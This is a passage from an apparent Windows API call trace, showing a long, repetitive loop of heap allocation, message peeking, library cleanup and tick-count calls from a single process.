0x2632128 [0066.576] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.576] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.576] CoFreeUnusedLibraries () [0066.576] GetTickCount () returned 0x1d2b9 [0066.576] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.576] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.576] GetTickCount () returned 0x1d2b9 [0066.576] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.576] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.576] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.576] CoFreeUnusedLibraries () [0066.576] GetTickCount () returned 0x1d2b9 [0066.576] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.576] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.576] GetTickCount () returned 0x1d2b9 [0066.576] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.576] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.576] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.576] CoFreeUnusedLibraries () [0066.576] GetTickCount () returned 0x1d2b9 [0066.576] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.576] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.576] GetTickCount () returned 0x1d2b9 [0066.577] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.577] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.577] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.577] CoFreeUnusedLibraries () [0066.577] GetTickCount () returned 0x1d2b9 [0066.577] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.577] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.577] GetTickCount () returned 0x1d2b9 [0066.577] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.577] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.577] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.577] CoFreeUnusedLibraries () [0066.577] GetTickCount () returned 0x1d2b9 [0066.577] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.577] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.577] GetTickCount () returned 0x1d2b9 [0066.577] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.577] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.577] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.577] CoFreeUnusedLibraries () [0066.577] GetTickCount () returned 0x1d2b9 [0066.577] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.577] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.577] GetTickCount () returned 0x1d2b9 [0066.577] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.577] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.577] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.577] CoFreeUnusedLibraries () [0066.578] GetTickCount () returned 0x1d2b9 [0066.578] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.578] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.578] GetTickCount () returned 0x1d2b9 [0066.578] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.578] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.578] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.578] CoFreeUnusedLibraries () [0066.578] GetTickCount () returned 0x1d2c8 [0066.578] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.578] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.578] GetTickCount () returned 0x1d2c8 [0066.578] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.578] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.578] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.578] CoFreeUnusedLibraries () [0066.578] GetTickCount () returned 0x1d2c8 [0066.578] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.578] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.578] GetTickCount () returned 0x1d2c8 [0066.578] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.578] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.579] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.579] CoFreeUnusedLibraries () [0066.579] GetTickCount () returned 0x1d2c8 [0066.579] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.579] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.579] GetTickCount () returned 0x1d2c8 [0066.579] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.579] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.579] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.579] CoFreeUnusedLibraries () [0066.579] GetTickCount () returned 0x1d2c8 [0066.579] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.579] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.579] GetTickCount () returned 0x1d2c8 [0066.579] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.579] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.579] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.579] CoFreeUnusedLibraries () [0066.579] GetTickCount () returned 0x1d2c8 [0066.579] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.579] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.579] GetTickCount () returned 0x1d2c8 [0066.579] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.579] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.579] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.579] CoFreeUnusedLibraries () [0066.579] GetTickCount () returned 0x1d2c8 [0066.580] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.580] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.580] GetTickCount () returned 0x1d2c8 [0066.580] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.580] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.580] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.580] CoFreeUnusedLibraries () [0066.580] GetTickCount () returned 0x1d2c8 [0066.580] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.580] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.580] GetTickCount () returned 0x1d2c8 [0066.580] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.580] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.580] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.580] CoFreeUnusedLibraries () [0066.580] GetTickCount () returned 0x1d2c8 [0066.580] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.580] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.580] GetTickCount () returned 0x1d2c8 [0066.580] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.580] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.580] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.580] CoFreeUnusedLibraries () [0066.580] GetTickCount () returned 0x1d2c8 [0066.580] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.580] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.580] GetTickCount () returned 0x1d2c8 [0066.581] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.581] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.581] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.581] CoFreeUnusedLibraries () [0066.581] GetTickCount () returned 0x1d2c8 [0066.581] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.581] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.581] GetTickCount () returned 0x1d2c8 [0066.581] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.581] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.581] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.581] CoFreeUnusedLibraries () [0066.581] GetTickCount () returned 0x1d2c8 [0066.581] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.581] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.581] GetTickCount () returned 0x1d2c8 [0066.581] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.581] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.581] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.581] CoFreeUnusedLibraries () [0066.581] GetTickCount () returned 0x1d2c8 [0066.581] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.581] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.581] GetTickCount () returned 0x1d2c8 [0066.581] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.581] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.582] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.582] CoFreeUnusedLibraries () [0066.582] GetTickCount () returned 0x1d2c8 [0066.582] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.582] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.582] GetTickCount () returned 0x1d2c8 [0066.582] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.582] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.582] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.582] CoFreeUnusedLibraries () [0066.582] GetTickCount () returned 0x1d2c8 [0066.582] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.582] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.582] GetTickCount () returned 0x1d2c8 [0066.582] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.582] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.582] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.582] CoFreeUnusedLibraries () [0066.582] GetTickCount () returned 0x1d2c8 [0066.582] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.582] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.582] GetTickCount () returned 0x1d2c8 [0066.582] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.582] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.582] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.582] CoFreeUnusedLibraries () [0066.582] GetTickCount () returned 0x1d2c8 [0066.583] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.583] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.583] GetTickCount () returned 0x1d2c8 [0066.583] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.583] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.583] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.583] CoFreeUnusedLibraries () [0066.583] GetTickCount () returned 0x1d2c8 [0066.583] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.583] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.583] GetTickCount () returned 0x1d2c8 [0066.583] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.583] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.583] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.583] CoFreeUnusedLibraries () [0066.583] GetTickCount () returned 0x1d2c8 [0066.583] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.583] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.583] GetTickCount () returned 0x1d2c8 [0066.583] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.583] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.583] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.583] CoFreeUnusedLibraries () [0066.583] GetTickCount () returned 0x1d2c8 [0066.583] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.583] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.583] GetTickCount () returned 0x1d2c8 [0066.584] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.584] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.584] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.584] CoFreeUnusedLibraries () [0066.584] GetTickCount () returned 0x1d2c8 [0066.584] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.584] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.584] GetTickCount () returned 0x1d2c8 [0066.584] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.584] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.584] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.584] CoFreeUnusedLibraries () [0066.584] GetTickCount () returned 0x1d2c8 [0066.584] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.584] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.584] GetTickCount () returned 0x1d2c8 [0066.584] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.584] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.584] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.584] CoFreeUnusedLibraries () [0066.584] GetTickCount () returned 0x1d2c8 [0066.584] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.584] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.584] GetTickCount () returned 0x1d2c8 [0066.584] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.584] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.585] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.585] CoFreeUnusedLibraries () [0066.585] GetTickCount () returned 0x1d2c8 [0066.585] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.585] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.585] GetTickCount () returned 0x1d2c8 [0066.585] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.585] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.585] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.585] CoFreeUnusedLibraries () [0066.585] GetTickCount () returned 0x1d2c8 [0066.585] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.585] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.585] GetTickCount () returned 0x1d2c8 [0066.585] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.585] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.585] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.585] CoFreeUnusedLibraries () [0066.585] GetTickCount () returned 0x1d2c8 [0066.585] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.585] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.585] GetTickCount () returned 0x1d2c8 [0066.585] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.585] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.585] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.585] CoFreeUnusedLibraries () [0066.585] GetTickCount () returned 0x1d2c8 [0066.586] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.586] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.586] GetTickCount () returned 0x1d2c8 [0066.586] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.586] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.586] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.586] CoFreeUnusedLibraries () [0066.586] GetTickCount () returned 0x1d2c8 [0066.586] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.586] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.586] GetTickCount () returned 0x1d2c8 [0066.586] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.586] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.586] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.586] CoFreeUnusedLibraries () [0066.586] GetTickCount () returned 0x1d2c8 [0066.586] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.586] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.586] GetTickCount () returned 0x1d2c8 [0066.586] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.586] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.586] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.586] CoFreeUnusedLibraries () [0066.586] GetTickCount () returned 0x1d2c8 [0066.586] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.586] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.586] GetTickCount () returned 0x1d2c8 [0066.587] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.587] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.587] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.587] CoFreeUnusedLibraries () [0066.587] GetTickCount () returned 0x1d2c8 [0066.587] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.587] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.587] GetTickCount () returned 0x1d2c8 [0066.587] RtlAllocateHeap 